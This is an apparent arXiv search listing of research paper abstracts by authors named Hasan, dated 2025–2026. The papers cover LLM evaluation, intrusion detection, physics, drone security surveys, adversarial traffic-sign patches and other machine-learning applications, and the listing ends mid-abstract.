-
Syntax Is Easy, Semantics Is Hard: Evaluating LLMs for LTL Translation
Authors:
Priscilla Kyei Danso,
Mohammad Saqib Hasan,
Niranjan Balasubramanian,
Omar Chowdhury
Abstract:
Propositional Linear Temporal Logic (LTL) is a popular formalism for specifying desirable requirements and security and privacy policies for software, networks, and systems. Yet expressing such requirements and policies in LTL remains challenging because of its intricate semantics. Since many security and privacy analysis tools require LTL formulas as input, this difficulty places them out of reac…
▽ More
Propositional Linear Temporal Logic (LTL) is a popular formalism for specifying desirable requirements and security and privacy policies for software, networks, and systems. Yet expressing such requirements and policies in LTL remains challenging because of its intricate semantics. Since many security and privacy analysis tools require LTL formulas as input, this difficulty places them out of reach for many developers and analysts. Large Language Models (LLMs) could broaden access to such tools by translating natural language fragments into LTL formulas. This paper evaluates that premise by assessing how effectively several representative LLMs translate assertive English sentences into LTL formulas. Using both human-generated and synthetic ground-truth data, we evaluate effectiveness along syntactic and semantic dimensions. The results reveal three findings: (1) in line with prior findings, LLMs perform better on syntactic aspects of LTL than on semantic ones; (2) they generally benefit from more detailed prompts; and (3) reformulating the task as a Python code-completion problem substantially improves overall performance. We also discuss challenges in conducting a fair evaluation on this task and conclude with recommendations for future work.
△ Less
Submitted 8 April, 2026;
originally announced April 2026.
-
Attribution-Driven Explainable Intrusion Detection with Encoder-Based Large Language Models
Authors:
Umesh Biswas,
Shafqat Hasan,
Syed Mohammed Farhan,
Nisha Pillai,
Charan Gudla
Abstract:
Software-Defined Networking (SDN) improves network flexibility but also increases the need for reliable and interpretable intrusion detection. Large Language Models (LLMs) have recently been explored for cybersecurity tasks due to their strong representation learning capabilities; however, their lack of transparency limits their practical adoption in security-critical environments. Understanding h…
▽ More
Software-Defined Networking (SDN) improves network flexibility but also increases the need for reliable and interpretable intrusion detection. Large Language Models (LLMs) have recently been explored for cybersecurity tasks due to their strong representation learning capabilities; however, their lack of transparency limits their practical adoption in security-critical environments. Understanding how LLMs make decisions is therefore essential. This paper presents an attribution-driven analysis of encoder-based LLMs for network intrusion detection using flow-level traffic features. Attribution analysis demonstrates that model decisions are driven by meaningful traffic behavior patterns, improving transparency and trust in transformer-based SDN intrusion detection. These patterns align with established intrusion detection principles, indicating that LLMs learn attack behavior from traffic dynamics. This work demonstrates the value of attribution methods for validating and trusting LLM-based security analysis.
△ Less
Submitted 6 April, 2026;
originally announced April 2026.
-
Phase-space integrals through Mellin-Barnes representation
Authors:
Taushif Ahmed,
Syed Mehedi Hasan,
Andreas Rapakoulias
Abstract:
We compute angular phase-space integrals with three and four denominators analytically, working within dimensional regularisation via the Mellin-Barnes (MB) representation. The approach converts multifold MB integrals into real parametric integrals and expresses all results in terms of Goncharov polylogarithms (GPLs). For three denominators, all-massless results are obtained to $\mathcal{O}(ε^2)$…
▽ More
We compute angular phase-space integrals with three and four denominators analytically, working within dimensional regularisation via the Mellin-Barnes (MB) representation. The approach converts multifold MB integrals into real parametric integrals and expresses all results in terms of Goncharov polylogarithms (GPLs). For three denominators, all-massless results are obtained to $\mathcal{O}(ε^2)$ and the single-massive case to $\mathcal{O}(ε)$; for four denominators, both the massless and single-massive cases are solved to $\mathcal{O}(ε^0)$. Integrals with multiple massive momenta follow from a partial fraction decomposition reducing them to the single-massive case. Recursion relations relating integrals with higher denominator powers to master integrals are derived. These are essential ingredients to solving full phase-space integrals.
△ Less
Submitted 1 April, 2026;
originally announced April 2026.
-
Simulating cavity QED with spin-orbit coupled Bose-Einstein condensates revisited
Authors:
Muhammad S. Hasan,
Karol Gietka
Abstract:
Simulating cavity quantum electrodynamics in synthetic platforms offers a promising route to exploring light-matter interactions without real photons, while enabling the transfer of cavity-based techniques to other systems. Among such platforms, Bose-Einstein condensates with synthetic spin-orbit coupling provide a controllable setting where internal and motional degrees of freedom become coupled,…
▽ More
Simulating cavity quantum electrodynamics in synthetic platforms offers a promising route to exploring light-matter interactions without real photons, while enabling the transfer of cavity-based techniques to other systems. Among such platforms, Bose-Einstein condensates with synthetic spin-orbit coupling provide a controllable setting where internal and motional degrees of freedom become coupled, mimicking aspects of cavity quantum electrodynamics. In this work, we critically assess the extent to which spin-orbit coupled Bose-Einstein condensates can emulate cavity quantum electrodynamics phenomena, with a focus on squeezing and entanglement generation. We show that spin-orbit coupled Bose-Einstein condensates can faithfully reproduce the physics of a single atom coupled to a quantized field, realizing an analogue of the quantum Rabi model but inherently fail to capture genuine collective effects characteristic of the Dicke model, such as cavity-mediated many-body entanglement. Our results clarify both the potential and the fundamental limitations of spin-orbit coupled Bose-Einstein condensates as analogue quantum simulators of cavity quantum electrodynamics, offering guidance for future strategies to generate and control non-classical states of matter in photon-free, highly tunable platforms.
△ Less
Submitted 30 March, 2026;
originally announced March 2026.
-
A Multimodal Framework for Human-Multi-Agent Interaction
Authors:
Shaid Hasan,
Breenice Lee,
Sujan Sarker,
Tariq Iqbal
Abstract:
Human-robot interaction is increasingly moving toward multi-robot, socially grounded environments. Existing systems struggle to integrate multimodal perception, embodied expression, and coordinated decision-making in a unified framework. This limits natural and scalable interaction in shared physical spaces. We address this gap by introducing a multimodal framework for human-multi-agent interactio…
▽ More
Human-robot interaction is increasingly moving toward multi-robot, socially grounded environments. Existing systems struggle to integrate multimodal perception, embodied expression, and coordinated decision-making in a unified framework. This limits natural and scalable interaction in shared physical spaces. We address this gap by introducing a multimodal framework for human-multi-agent interaction in which each robot operates as an autonomous cognitive agent with integrated multimodal perception and Large Language Model (LLM)-driven planning grounded in embodiment. At the team level, a centralized coordination mechanism regulates turn-taking and agent participation to prevent overlapping speech and conflicting actions. Implemented on two humanoid robots, our framework enables coherent multi-agent interaction through interaction policies that combine speech, gesture, gaze, and locomotion. Representative interaction runs demonstrate coordinated multimodal reasoning across agents and grounded embodied responses. Future work will focus on larger-scale user studies and deeper exploration of socially grounded multi-agent interaction dynamics.
△ Less
Submitted 24 March, 2026;
originally announced March 2026.
-
Privacy Preserving Topic-wise Sentiment Analysis of the Iran Israel USA Conflict Using Federated Transformer Models
Authors:
Md Saiful Islam,
Tanjim Taharat Aurpa,
Sharad Hasan,
Farzana Akter
Abstract:
The recent escalation of the Iran Israel USA conflict in 2026 has triggered widespread global discussions across social media platforms. As people increasingly use these platforms for expressing opinions, analyzing public sentiment from these discussions can provide valuable insights into global public perception. This study aims to analyze global public sentiment regarding the Iran Israel USA con…
▽ More
The recent escalation of the Iran Israel USA conflict in 2026 has triggered widespread global discussions across social media platforms. As people increasingly use these platforms for expressing opinions, analyzing public sentiment from these discussions can provide valuable insights into global public perception. This study aims to analyze global public sentiment regarding the Iran Israel USA conflict by mining user-generated comments from YouTube news channels. The work contributes to public opinion analysis by introducing a privacy preserving framework that combines topic wise sentiment analysis with modern deep learning techniques and Federated Learning. To achieve this, approximately 19,000 YouTube comments were collected from major international news channels and preprocessed to remove noise and normalize text. Sentiment labels were initially generated using the VADER sentiment analyzer and later validated through manual inspection to improve reliability. Latent Dirichlet Allocation (LDA) was applied to identify key discussion topics related to the conflict. Several transformer-based models, including BERT, RoBERTa, XLNet, DistilBERT, ModernBERT, and ELECTRA, were fine tuned for sentiment classification. The best-performing model was further integrated into a federated learning environment to enable distributed training by preserving user data privacy. Additionally, Explainable Artificial Intelligence (XAI) techniques using SHAP were applied to interpret model predictions and identify influential words affecting sentiment classification. Experimental results demonstrate that transformer models perform effectively, and among them, ELECTRA achieved the best performance with 91.32% accuracy. The federated learning also maintained strong performance while preserving privacy, achieving 89.59% accuracy in a two client configuration.
△ Less
Submitted 13 March, 2026;
originally announced March 2026.
-
A Robust Deep Learning Framework for Bangla License Plate Recognition Using YOLO and Vision-Language OCR
Authors:
Nayeb Hasin,
Md. Arafath Rahman Nishat,
Mainul Islam,
Khandakar Shakib Al Hasan,
Asif Newaz
Abstract:
An Automatic License Plate Recognition (ALPR) system constitutes a crucial element in an intelligent traffic management system. However, the detection of Bangla license plates remains challenging because of the complicated character scheme and uneven layouts. This paper presents a robust Bangla License Plate Recognition system that integrates a deep learning-based object detection model for licens…
▽ More
An Automatic License Plate Recognition (ALPR) system constitutes a crucial element in an intelligent traffic management system. However, the detection of Bangla license plates remains challenging because of the complicated character scheme and uneven layouts. This paper presents a robust Bangla License Plate Recognition system that integrates a deep learning-based object detection model for license plate localization with Optical Character Recognition for text extraction. Multiple object detection architectures, including U-Net and several YOLO (You Only Look Once) variants, are compared for license plate localization. This study proposes a novel two-stage adaptive training strategy built upon the YOLOv8 architecture to improve localization performance. The proposed approach outperforms the established models, achieving an accuracy of 97.83% and an Intersection over Union (IoU) of 91.3%. The text recognition problem is phrased as a sequence generation problem with a VisionEncoderDecoder architecture, with a combination of encoder-decoders evaluated. It was demonstrated that the ViT + BanglaBERT model gives better results at the character level, with a Character Error Rate of 0.1323 and Word Error Rate of 0.1068. The proposed system also shows a consistent performance when tested on an external dataset that has been curated for this study purpose. The dataset offers completely different environment and lighting conditions compared to the training sample, indicating the robustness of the proposed framework. Overall, our proposed system provides a robust and reliable solution for Bangla license plate recognition and performs effectively across diverse real-world scenarios, including variations in lighting, noise, and plate styles. These strengths make it well suited for deployment in intelligent transportation applications such as automated law enforcement and access control.
△ Less
Submitted 10 March, 2026;
originally announced March 2026.
-
TimeSpot: Benchmarking Geo-Temporal Understanding in Vision-Language Models in Real-World Settings
Authors:
Azmine Toushik Wasi,
Shahriyar Zaman Ridoy,
Koushik Ahamed Tonmoy,
Kinga Tshering,
S. M. Muhtasimul Hasan,
Wahid Faisal,
Tasnim Mohiuddin,
Md Rizwan Parvez
Abstract:
Geo-temporal understanding, the ability to infer location, time, and contextual properties from visual input alone, underpins applications such as disaster management, traffic planning, embodied navigation, world modeling, and geography education. Although recent vision-language models (VLMs) have advanced image geo-localization using cues like landmarks and road signs, their ability to reason abo…
▽ More
Geo-temporal understanding, the ability to infer location, time, and contextual properties from visual input alone, underpins applications such as disaster management, traffic planning, embodied navigation, world modeling, and geography education. Although recent vision-language models (VLMs) have advanced image geo-localization using cues like landmarks and road signs, their ability to reason about temporal signals and physically grounded spatial cues remains limited. To address this gap, we introduce TimeSpot, a benchmark for evaluating real-world geo-temporal reasoning in VLMs. TimeSpot comprises 1,455 ground-level images from 80 countries and requires structured prediction of temporal attributes (season, month, time of day, daylight phase) and geographic attributes (continent, country, climate zone, environment type, latitude-longitude) directly from visual evidence. It also includes spatial-temporal reasoning tasks that test physical plausibility under real-world uncertainty. Evaluations of state-of-the-art open- and closed-source VLMs show low performance, particularly for temporal inference. While supervised fine-tuning yields improvements, results remain insufficient, highlighting the need for new methods to achieve robust, physically grounded geo-temporal understanding. TimeSpot is available at: https://TimeSpot-GT.github.io.
△ Less
Submitted 4 March, 2026;
originally announced March 2026.
-
Physical Evaluation of Naturalistic Adversarial Patches for Camera-Based Traffic-Sign Detection
Authors:
Brianna D'Urso,
Tahmid Hasan Sakib,
Syed Rafay Hasan,
Terry N. Guo
Abstract:
This paper studies how well Naturalistic Adversarial Patches (NAPs) transfer to a physical traffic sign setting when the detector is trained on a customized dataset for an autonomous vehicle (AV) environment. We construct a composite dataset, CompGTSRB (which is customized dataset for AV environment), by pasting traffic sign instances from the German Traffic Sign Recognition Benchmark (GTSRB) onto…
▽ More
This paper studies how well Naturalistic Adversarial Patches (NAPs) transfer to a physical traffic sign setting when the detector is trained on a customized dataset for an autonomous vehicle (AV) environment. We construct a composite dataset, CompGTSRB (which is customized dataset for AV environment), by pasting traffic sign instances from the German Traffic Sign Recognition Benchmark (GTSRB) onto undistorted backgrounds captured from the target platform. CompGTSRB is used to train a YOLOv5 model and generate patches using a Generative Adversarial Network (GAN) with latent space optimization, following existing NAP methods. We carried out a series of experiments on our Quanser QCar testbed utilizing the front CSI camera provided in QCar. Across configurations, NAPs reduce the detector's STOP class confidence. Different configurations include distance, patch sizes, and patch placement. These results along with a detailed step-by-step methodology indicate the utility of CompGTSRB dataset and the proposed systematic physical protocols for credible patch evaluation. The research further motivate researching the defenses that address localized patch corruption in embedded perception pipelines.
△ Less
Submitted 27 February, 2026;
originally announced March 2026.
-
Make It Hard to Hear, Easy to Learn: Long-Form Bengali ASR and Speaker Diarization via Extreme Augmentation and Perfect Alignment
Authors:
Sanjid Hasan,
Risalat Labib,
A H M Fuad,
Bayazid Hasan
Abstract:
Although Automatic Speech Recognition (ASR) in Bengali has seen significant progress, processing long-duration audio and performing robust speaker diarization remain critical research gaps. To address the severe scarcity of joint ASR and diarization resources for this language, we introduce Lipi-Ghor-882, a comprehensive 882-hour multi-speaker Bengali dataset. In this paper, detailing our submissi…
▽ More
Although Automatic Speech Recognition (ASR) in Bengali has seen significant progress, processing long-duration audio and performing robust speaker diarization remain critical research gaps. To address the severe scarcity of joint ASR and diarization resources for this language, we introduce Lipi-Ghor-882, a comprehensive 882-hour multi-speaker Bengali dataset. In this paper, detailing our submission to the DL Sprint 4.0 competition, we systematically evaluate various architectures and approaches for long-form Bengali speech. For ASR, we demonstrate that raw data scaling is ineffective; instead, targeted fine-tuning utilizing perfectly aligned annotations paired with synthetic acoustic degradation (noise and reverberation) emerges as the singular most effective approach. Conversely, for speaker diarization, we observed that global open-source state-of-the-art models (such as Diarizen) performed surprisingly poorly on this complex dataset. Extensive model retraining yielded negligible improvements; instead, strategic, heuristic post-processing of baseline model outputs proved to be the primary driver for increasing accuracy. Ultimately, this work outlines a highly optimized dual pipeline achieving a $\sim$0.019 Real-Time Factor (RTF), establishing a practical, empirically backed benchmark for low-resource, long-form speech processing.
△ Less
Submitted 26 February, 2026;
originally announced February 2026.
-
The Quiet Contributions: Insights into AI-Generated Silent Pull Requests
Authors:
S M Mahedy Hasan,
Md Fazle Rabbi,
Minhaz Zibran
Abstract:
We present the first empirical study of AI-generated pull requests that are 'silent,' meaning no comments or discussions accompany them. This absence of any comments or discussions associated with such silent AI pull requests (SPRs) poses a unique challenge in understanding the rationale for their acceptance or rejection. Hence, we quantitatively study 4,762 SPRs of five AI agents made to popular…
▽ More
We present the first empirical study of AI-generated pull requests that are 'silent,' meaning no comments or discussions accompany them. This absence of any comments or discussions associated with such silent AI pull requests (SPRs) poses a unique challenge in understanding the rationale for their acceptance or rejection. Hence, we quantitatively study 4,762 SPRs of five AI agents made to popular Python repositories drawn from the AIDev public dataset. We examine SPRs impact on code complexity, other quality issues, and security vulnerabilities, especially to determine whether these insights can hint at the rationale for acceptance or rejection of SPRs.
△ Less
Submitted 28 January, 2026;
originally announced January 2026.
-
Teaching and Evaluating LLMs to Reason About Polymer Design Related Tasks
Authors:
Dikshya Mohanty,
Mohammad Saqib Hasan,
Syed Mostofa Monsur,
Size Zheng,
Benjamin Hsiao,
Niranjan Balasubramanian
Abstract:
Research in AI4Science has shown promise in many science applications, including polymer design. However, current LLMs prove ineffective on this problem space because: (i) most models lack polymer-specific knowledge (ii) existing aligned models lack coverage of knowledge and capabilities relevant to polymer design. Addressing this, we introduce PolyBench, a large scale training and test benchmark…
▽ More
Research in AI4Science has shown promise in many science applications, including polymer design. However, current LLMs prove ineffective on this problem space because: (i) most models lack polymer-specific knowledge (ii) existing aligned models lack coverage of knowledge and capabilities relevant to polymer design. Addressing this, we introduce PolyBench, a large scale training and test benchmark dataset of more than 125K polymer design related tasks, leveraging a knowledge base of 13M+ data points obtained from experimental and synthetic sources to ensure broad coverage of polymers and their properties. For effective alignment using PolyBench, we introduce a knowledge-augmented reasoning distillation method that augments this dataset with structured CoT. Furthermore, tasks in PolyBench are organized from simple to complex analytical reasoning problems, enabling generalization tests and diagnostic probes across the problem space. Experiments show that small language models (SLMs), of 7B to 14B parameters, trained on PolyBench data outperform similar sized models, and even closed source frontier LLMs on PolyBench test dataset while demonstrating gains on other polymer benchmarks as well.
△ Less
Submitted 22 January, 2026;
originally announced January 2026.
-
A Survey of Security Challenges and Solutions for Advanced Air Mobility and eVTOL Aircraft
Authors:
Mahyar Ghazanfari,
Iman Sharifi,
Peng Wei,
Noah Dahle,
Abel Diaz Gonzalez,
Austin Coursey,
Bryce Bjorkman,
Cailani Lemieux-Mack,
Robert Canady,
Abenezer Taye,
Bryan C. Ward,
Xenofon Koutsoukos,
Gautam Biswas,
Maheed H. Ahmed,
Hyeong Tae Kim,
Mahsa Ghasemi,
Vijay Gupta,
Filippos Fotiadis,
Ufuk Topcu,
Junchi Lu,
Alfred Chen,
Abdul Kareem Ras,
Nischal Aryal,
Amer Ibrahim,
Amir Shirkhodaie
, et al. (3 additional authors not shown)
Abstract:
This survey reviews the existing and envisioned security vulnerabilities and defense mechanisms relevant to Advanced Air Mobility (AAM) systems, with a focus on electric vertical takeoff and landing (eVTOL) aircraft. Drawing from vulnerabilities in the avionics in commercial aviation and the automated unmanned aerial systems (UAS), the paper presents a taxonomy of attacks, analyzes mitigation stra…
▽ More
This survey reviews the existing and envisioned security vulnerabilities and defense mechanisms relevant to Advanced Air Mobility (AAM) systems, with a focus on electric vertical takeoff and landing (eVTOL) aircraft. Drawing from vulnerabilities in the avionics in commercial aviation and the automated unmanned aerial systems (UAS), the paper presents a taxonomy of attacks, analyzes mitigation strategies, and proposes a secure system architecture tailored to the future AAM ecosystem. The paper also highlights key threat vectors, including Global Positioning System (GPS) jamming/spoofing, ATC radio frequency misuse, attacks on TCAS and ADS-B, possible backdoor via Electronic Flight Bag (EFB), new vulnerabilities introduced by aircraft automation and connectivity, and risks from flight management system (FMS) software, database and cloud services. Finally, this paper describes emerging defense techniques against these attacks, and open technical problems to address toward better defense mechanisms.
△ Less
Submitted 20 January, 2026;
originally announced January 2026.
-
A Survey of Security Challenges and Solutions for UAS Traffic Management (UTM) and small Unmanned Aerial Systems (sUAS)
Authors:
Iman Sharifi,
Mahyar Ghazanfari,
Abenezer Taye,
Peng Wei,
Maheed H. Ahmed,
Hyeong Tae Kim,
Mahsa Ghasemi,
Vijay Gupta,
Noah Dahle,
Robert Canady,
Abel Diaz Gonzalez,
Austin Coursey,
Bryce Bjorkman,
Cailani Lemieux-Mack,
Bryan C. Ward,
Xenofon Koutsoukos,
Gautam Biswas,
Heber Herencia-Zapana,
Saqib Hasan,
Isaac Amundson,
Filippos Fotiadis,
Ufuk Topcu,
Junchi Lu,
Qi Alfred Chen,
Nischal Aryal
, et al. (3 additional authors not shown)
Abstract:
The rapid growth of small Unmanned Aerial Systems (sUAS) for civil and commercial missions has intensified concerns about their resilience to cyber-security threats. Operating within the emerging UAS Traffic Management (UTM) framework, these lightweight and highly networked platforms depend on secure communication, navigation, and surveillance (CNS) subsystems that are vulnerable to spoofing, jamm…
▽ More
The rapid growth of small Unmanned Aerial Systems (sUAS) for civil and commercial missions has intensified concerns about their resilience to cyber-security threats. Operating within the emerging UAS Traffic Management (UTM) framework, these lightweight and highly networked platforms depend on secure communication, navigation, and surveillance (CNS) subsystems that are vulnerable to spoofing, jamming, hijacking, and data manipulation. While prior reviews of UAS security addressed these challenges at a conceptual level, a detailed, system-oriented analysis for resource-constrained sUAS remains lacking. This paper presents a comprehensive survey of cyber-security vulnerabilities and defenses tailored to the sUAS and UTM ecosystem. We organize existing research across the full cyber-physical stack, encompassing CNS, data links, sensing and perception, UTM cloud access, and software integrity layers, and classify attack vectors according to their technical targets and operational impacts. Correspondingly, we review defense mechanisms ranging from classical encryption and authentication to adaptive intrusion detection, lightweight cryptography, and secure firmware management. By mapping threats to mitigation strategies and evaluating their scalability and practical effectiveness, this work establishes a unified taxonomy and identifies open challenges for achieving safe, secure, and scalable sUAS operations within future UTM environments.
△ Less
Submitted 13 January, 2026;
originally announced January 2026.
-
Reinforcement Learning-Guided Dynamic Multi-Graph Fusion for Evacuation Traffic Prediction
Authors:
Md Nafees Fuad Rafi,
Samiul Hasan
Abstract:
Real-time traffic prediction is critical for managing transportation systems during hurricane evacuations. Although data-driven graph-learning models have demonstrated strong capabilities in capturing the complex spatiotemporal dynamics of evacuation traffic at a network level, they mostly consider a single dimension (e.g., travel-time or distance) to construct the underlying graph. Furthermore, t…
▽ More
Real-time traffic prediction is critical for managing transportation systems during hurricane evacuations. Although data-driven graph-learning models have demonstrated strong capabilities in capturing the complex spatiotemporal dynamics of evacuation traffic at a network level, they mostly consider a single dimension (e.g., travel-time or distance) to construct the underlying graph. Furthermore, these models often lack interpretability, offering little insight into which input variables contribute most to their predictive performance. To overcome these limitations, we develop a novel Reinforcement Learning-guided Dynamic Multi-Graph Fusion (RL-DMF) framework for evacuation traffic prediction. We construct multiple dynamic graphs at each time step to represent heterogeneous spatiotemporal relationships between traffic detectors. A dynamic multi-graph fusion (DMF) module is employed to adaptively learn and combine information from these graphs. To enhance model interpretability, we introduce RL-based intelligent feature selection and ranking (RL-IFSR) method that learns to mask irrelevant features during model training. The model is evaluated using a real-world dataset of 12 hurricanes affecting Florida from 2016 to 2024. For an unseen hurricane (Milton, 2024), the model achieves a 95% accuracy (RMSE = 293.9) for predicting the next 1-hour traffic flow. Moreover, the model can forecast traffic flow for up to next 6 hours with 90% accuracy (RMSE = 426.4). The RL-DMF framework outperforms several state-of-the-art traffic prediction models. Furthermore, ablation experiments confirm the effectiveness of dynamic multi-graph fusion and RL-IFSR approaches for improving model performance. This research provides a generalized and interpretable model for real-time evacuation traffic forecasting, with significant implications for evacuation traffic management.
△ Less
Submitted 10 January, 2026;
originally announced January 2026.
-
A Dual Pipeline Machine Learning Framework for Automated Multi Class Sleep Disorder Screening Using Hybrid Resampling and Ensemble Learning
Authors:
Md Sultanul Islam Ovi,
Muhsina Tarannum Munfa,
G. M. M Miftahul Alam Adib,
Syed Sabbir Hasan
Abstract:
Accurate classification of sleep disorders, particularly insomnia and sleep apnea, is important for reducing long term health risks and improving patient quality of life. However, clinical sleep studies are resource intensive and are difficult to scale for population level screening. This paper presents a Dual Pipeline Machine Learning Framework for multi class sleep disorder screening using the S…
▽ More
Accurate classification of sleep disorders, particularly insomnia and sleep apnea, is important for reducing long term health risks and improving patient quality of life. However, clinical sleep studies are resource intensive and are difficult to scale for population level screening. This paper presents a Dual Pipeline Machine Learning Framework for multi class sleep disorder screening using the Sleep Health and Lifestyle dataset. The framework consists of two parallel processing streams: a statistical pipeline that targets linear separability using Mutual Information and Linear Discriminant Analysis, and a wrapper based pipeline that applies Boruta feature selection with an autoencoder for non linear representation learning. To address class imbalance, we use the hybrid SMOTETomek resampling strategy. In experiments, Extra Trees and K Nearest Neighbors achieved an accuracy of 98.67%, outperforming recent baselines on the same dataset. Statistical testing using the Wilcoxon Signed Rank Test indicates that the improvement over baseline configurations is significant, and inference latency remains below 400 milliseconds. These results suggest that the proposed dual pipeline design supports accurate and efficient automated screening for non invasive sleep disorder risk stratification.
△ Less
Submitted 6 February, 2026; v1 submitted 9 January, 2026;
originally announced January 2026.
-
CircuitLM: A Multi-Agent LLM-Aided Design Framework for Generating Circuit Schematics from Natural Language Prompts
Authors:
Khandakar Shakib Al Hasan,
Syed Rifat Raiyan,
Hasin Mahtab Alvee,
Wahid Sadik
Abstract:
Generating accurate circuit schematics from high-level natural language descriptions remains a persistent challenge in electronic design automation (EDA), as large language models (LLMs) frequently hallucinate components, violate strict physical constraints, and produce non-machine-readable outputs. To address this, we present CircuitLM, a multi-agent pipeline that translates user prompts into str…
▽ More
Generating accurate circuit schematics from high-level natural language descriptions remains a persistent challenge in electronic design automation (EDA), as large language models (LLMs) frequently hallucinate components, violate strict physical constraints, and produce non-machine-readable outputs. To address this, we present CircuitLM, a multi-agent pipeline that translates user prompts into structured, visually interpretable $\texttt{CircuitJSON}$ schematics. The framework mitigates hallucination and ensures physical viability by grounding generation in a curated, embedding-powered component knowledge base through five sequential stages: (i) component identification, (ii) canonical pinout retrieval, (iii) chain-of-thought reasoning, (iv) JSON schematic synthesis, and (v) interactive force-directed visualization. We evaluate the system on a dataset of 100 unique circuit-design prompts using five state-of-the-art LLMs. To systematically assess performance, we deploy a rigorous dual-layered evaluation methodology: a deterministic Electrical Rule Checking (ERC) engine categorizes topological faults by strict severity (Critical, Major, Minor, Warning), while an LLM-as-a-judge meta-evaluator identifies complex, context-aware design flaws that bypass standard rule-based checkers. Ultimately, this work demonstrates how targeted retrieval combined with deterministic and semantic verification can bridge natural language to structurally viable, schematic-ready hardware and safe circuit prototyping. Our code and data will be made public.
△ Less
Submitted 17 March, 2026; v1 submitted 7 January, 2026;
originally announced January 2026.
-
Generalization Gaps in Political Fake News Detection: An Empirical Study on the LIAR Dataset
Authors:
S Mahmudul Hasan,
Shaily Roy,
Akib Jawad Nafis
Abstract:
The proliferation of linguistically subtle political disinformation poses a significant challenge to automated fact-checking systems. Despite increasing emphasis on complex neural architectures, the empirical limits of text-only linguistic modeling remain underexplored. We present a systematic diagnostic evaluation of nine machine learning algorithms on the LIAR benchmark. By isolating lexical fea…
▽ More
The proliferation of linguistically subtle political disinformation poses a significant challenge to automated fact-checking systems. Despite increasing emphasis on complex neural architectures, the empirical limits of text-only linguistic modeling remain underexplored. We present a systematic diagnostic evaluation of nine machine learning algorithms on the LIAR benchmark. By isolating lexical features (Bag-of-Words, TF-IDF) and semantic embeddings (GloVe), we uncover a hard "Performance Ceiling", with fine-grained classification not exceeding a Weighted F1-score of 0.32 across models. Crucially, a simple linear SVM (Accuracy: 0.624) matches the performance of pre-trained Transformers such as RoBERTa (Accuracy: 0.620), suggesting that model capacity is not the primary bottleneck. We further diagnose a massive "Generalization Gap" in tree-based ensembles, which achieve more than 99% training accuracy but collapse to approximately 25% on test data, indicating reliance on lexical memorization rather than semantic inference. Synthetic data augmentation via SMOTE yields no meaningful gains, confirming that the limitation is semantic (feature ambiguity) rather than distributional. These findings indicate that for political fact-checking, increasing model complexity without incorporating external knowledge yields diminishing returns.
△ Less
Submitted 20 December, 2025;
originally announced December 2025.
-
Prompt Searches for Very-High-Energy γ-Ray Counterparts to IceCube Astrophysical Neutrino Alerts
Authors:
J. Abhir,
A. Biland,
K. Brand,
T. Bretz,
D. Dorner,
L. Eisenberger,
D. Elsaesser,
P. Günther,
S. Hasan,
D. Hildebrand,
K. Mannheim,
M. Linhoff,
F. Pfeifle,
W. Rhode,
B. Schleicher,
V. Sliusar,
M. Vorbrugg,
R. Walter,
F. Aharonian,
F. Ait Benkhali,
J. Aschersleben,
H. Ashkar,
M. Backes,
V. Barbosa Martins,
R. Batzofin
, et al. (809 additional authors not shown)
Abstract:
The search for sources of high-energy astrophysical neutrinos can be significantly advanced through a multi-messenger approach, which seeks to detect the gamma rays that accompany neutrinos as they are produced at their sources. Multi-messenger observations have so far provided the first evidence for a neutrino source, illustrated by the joint detection of the flaring blazar TXS 0506+056 in highen…
▽ More
The search for sources of high-energy astrophysical neutrinos can be significantly advanced through a multi-messenger approach, which seeks to detect the gamma rays that accompany neutrinos as they are produced at their sources. Multi-messenger observations have so far provided the first evidence for a neutrino source, illustrated by the joint detection of the flaring blazar TXS 0506+056 in highenergy (HE, E > 1 GeV) and very-high-energy (VHE, E > 100 GeV) gamma rays in coincidence with the high-energy neutrino IceCube-170922A, identified by IceCube. Imaging atmospheric Cherenkov telescopes (IACTs), namely FACT, H.E.S.S., MAGIC, and VERITAS, continue to conduct extensive neutrino target-of-opportunity follow-up programs. These programs have two components: followup observations of single astrophysical neutrino candidate events (such as IceCube-170922A), and observation of known gamma-ray sources after the identification of a cluster of neutrino events by IceCube. Here we present a comprehensive analysis of follow-up observations of high-energy neutrino events observed by the four IACTs between September 2017 (after the IceCube-170922A event) and January 2021. Our study found no associations between gamma-ray sources and the observed neutrino events. We provide a detailed overview of each neutrino event and its potential counterparts. Furthermore, a joint analysis of all IACT data is included, yielding combined upper limits on the VHE gamma-ray flux.
△ Less
Submitted 18 December, 2025;
originally announced December 2025.
-
Flow-Based Path Planning for Multiple Homogenous UAVs for Outdoor Formation-Flying
Authors:
Mahmud Suhaimi Ibrahim,
Shantanu Rahman,
Muhammad Samin Hasan,
Minhaj Uddin Ahmad,
Abdullah Abrar
Abstract:
Collision-free path planning is the most crucial component in multi-UAV formation-flying (MFF). We use unlabeled homogenous quadcopters (UAVs) to demonstrate the use of a flow network to create complete (inter-UAV) collision-free paths. This procedure has three main parts: 1) Creating a flow network graph from physical GPS coordinates, 2) Finding a path of minimum cost (least distance) using any g…
▽ More
Collision-free path planning is the most crucial component in multi-UAV formation-flying (MFF). We use unlabeled homogenous quadcopters (UAVs) to demonstrate the use of a flow network to create complete (inter-UAV) collision-free paths. This procedure has three main parts: 1) Creating a flow network graph from physical GPS coordinates, 2) Finding a path of minimum cost (least distance) using any graph-based path-finding algorithm, and 3) Implementing the Ford-Fulkerson Method to find the paths with the maximum flow (no collision). Simulations of up to 64 UAVs were conducted for various formations, followed by a practical experiment with 3 quadcopters for testing physical plausibility and feasibility. The results of these tests show the efficacy of this method's ability to produce safe, collision-free paths.
△ Less
Submitted 24 November, 2025;
originally announced November 2025.
-
FedPoisonTTP: A Threat Model and Poisoning Attack for Federated Test-Time Personalization
Authors:
Md Akil Raihan Iftee,
Syed Md. Ahnaf Hasan,
Amin Ahsan Ali,
AKM Mahbubur Rahman,
Sajib Mistry,
Aneesh Krishna
Abstract:
Test-time personalization in federated learning enables models at clients to adjust online to local domain shifts, enhancing robustness and personalization in deployment. Yet, existing federated learning work largely overlooks the security risks that arise when local adaptation occurs at test time. Heterogeneous domain arrivals, diverse adaptation algorithms, and limited cross-client visibility cr…
▽ More
